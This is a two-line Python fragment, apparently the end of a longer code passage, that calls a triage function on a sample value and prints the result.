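if __name__ == "__main__":
    print(triage(make_sample_value()))
```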
